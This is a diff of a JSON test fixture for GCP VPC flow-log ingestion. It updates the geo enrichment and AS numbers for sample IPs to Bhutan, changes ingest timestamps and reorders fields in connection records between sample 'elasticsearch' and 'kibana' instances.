@@ -12603,7 +13219,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391844200Z", + "ingested": "2021-12-14T14:43:27.415238717Z", "original": "{\"insertId\":\"ptjoddfhmrhgs\",\"jsonPayload\":{\"bytes_sent\":\"62620\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074952616Z", @@ -12619,11 +13235,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33692, 
@@ -12701,7 +13322,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391849600Z", + "ingested": "2021-12-14T14:43:27.415239213Z", "original": "{\"insertId\":\"ptjoddfhmrhge\",\"jsonPayload\":{\"bytes_sent\":\"185520\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.558259934Z", 
@@ -12712,43 +13333,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65262, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 33269, - "packets": 517, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", - "bytes": 33269, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 517, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -12759,6 +13343,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC" 
@@ -12776,8 +13363,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65262, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 33269, + "packets": 517, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.391853100Z", + "ingested": "2021-12-14T14:43:27.415239666Z", "original": "{\"insertId\":\"ptjoddfhmrhgc\",\"jsonPayload\":{\"bytes_sent\":\"33269\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65262,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"517\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.251430011Z", 
@@ -12785,6 +13397,18 @@ "id": "ptjoddfhmrhgc", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", + "bytes": 33269, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 517, + "direction": "outbound" } }, { @@ -12799,11 +13423,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33556, 
@@ -12875,7 +13504,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391858400Z", + "ingested": "2021-12-14T14:43:27.415240083Z", "original": "{\"insertId\":\"ptjoddfhmrhg7\",\"jsonPayload\":{\"bytes_sent\":\"58811\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:03.062674441Z", @@ -12891,11 +13520,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -12970,7 +13604,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391889200Z", + "ingested": "2021-12-14T14:43:27.415240486Z", "original": "{\"insertId\":\"ptjoddfhmrhgq\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"86\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466706102Z", 
@@ -12981,43 +13615,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 22, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" - }, - "as": { - "number": 4837 - }, - "address": "67.43.156.14", - "port": 41818, - "bytes": 0, - "ip": "67.43.156.14", - "packets": 4 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:iiFy+S+g1JJvu9kZvA1ivEiN2EM=", - "bytes": 0, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 4, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" @@ -13028,6 +13625,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -13048,8 +13648,33 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 22, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 41818, + "bytes": 0, + "ip": "67.43.156.14", + "packets": 4 + }, "event": { - "ingested": "2021-12-09T13:37:46.391895Z", + "ingested": "2021-12-14T14:43:27.415240968Z", "original": "{\"insertId\":\"bxuq05fhgmw9d\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":41818},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:13.478093057Z\",\"packets_sent\":\"4\",\"reporter\":\"DEST\",\"rtt_msec\":\"1350\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:11.031370298Z", 
@@ -13057,6 +13682,18 @@ "id": "bxuq05fhgmw9d", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:iiFy+S+g1JJvu9kZvA1ivEiN2EM=", + "bytes": 0, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 4, + "direction": "inbound" } }, { @@ -13065,11 +13702,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -13144,7 +13786,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391900700Z", + "ingested": "2021-12-14T14:43:27.415241365Z", "original": "{\"insertId\":\"bxuq05fhgmw90\",\"jsonPayload\":{\"bytes_sent\":\"4580\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"60\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.789945697Z", 
@@ -13155,9 +13797,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:16.593Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 92 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -13166,13 +13838,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65322, 
@@ -13180,6 +13855,16 @@ "ip": "67.43.156.13", "packets": 668 }, + "event": { + "ingested": "2021-12-14T14:43:27.415241790Z", + "original": "{\"insertId\":\"bxuq05fhgmw8w\",\"jsonPayload\":{\"bytes_sent\":\"270437\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65322},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"668\",\"reporter\":\"DEST\",\"rtt_msec\":\"92\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.703392247Z", + "end": "2019-06-14T03:49:55.408936364Z", + "id": "bxuq05fhgmw8w", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -13191,19 +13876,30 @@ "iana_number": "6", "packets": 668, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.13" ] }, - "gcp": { - "destination": { + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 92 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -13214,38 +13910,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 92 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391906300Z", - "original": "{\"insertId\":\"bxuq05fhgmw8w\",\"jsonPayload\":{\"bytes_sent\":\"270437\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65322},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"668\",\"reporter\":\"DEST\",\"rtt_msec\":\"92\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.703392247Z", - "end": "2019-06-14T03:49:55.408936364Z", - "id": "bxuq05fhgmw8w", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", 
"port": 65322, @@ -13259,6 +13937,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415242508Z", + "original": "{\"insertId\":\"bxuq05fhgmw94\",\"jsonPayload\":{\"bytes_sent\":\"19019\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65322,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"604\",\"reporter\":\"SRC\",\"rtt_msec\":\"92\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.703392247Z", + "end": "2019-06-14T03:49:55.408936364Z", + "id": "bxuq05fhgmw94", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -13270,46 +13958,6 @@ "iana_number": "6", "packets": 604, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:16.593Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 92 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391911700Z", - "original": "{\"insertId\":\"bxuq05fhgmw94\",\"jsonPayload\":{\"bytes_sent\":\"19019\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65322,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"604\",\"reporter\":\"SRC\",\"rtt_msec\":\"92\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.703392247Z", - "end": "2019-06-14T03:49:55.408936364Z", - "id": "bxuq05fhgmw94", - "category": "network", - "type": "connection" } }, { 
@@ -13324,11 +13972,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -13400,7 +14053,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391917200Z", + "ingested": "2021-12-14T14:43:27.415242990Z", "original": "{\"insertId\":\"bxuq05fhgmw8x\",\"jsonPayload\":{\"bytes_sent\":\"16208\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.455711202Z", 
@@ -13416,11 +14069,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -13498,7 +14156,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391922600Z", + "ingested": "2021-12-14T14:43:27.415243457Z", "original": "{\"insertId\":\"bxuq05fhgmw8v\",\"jsonPayload\":{\"bytes_sent\":\"9800\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.455711202Z", 
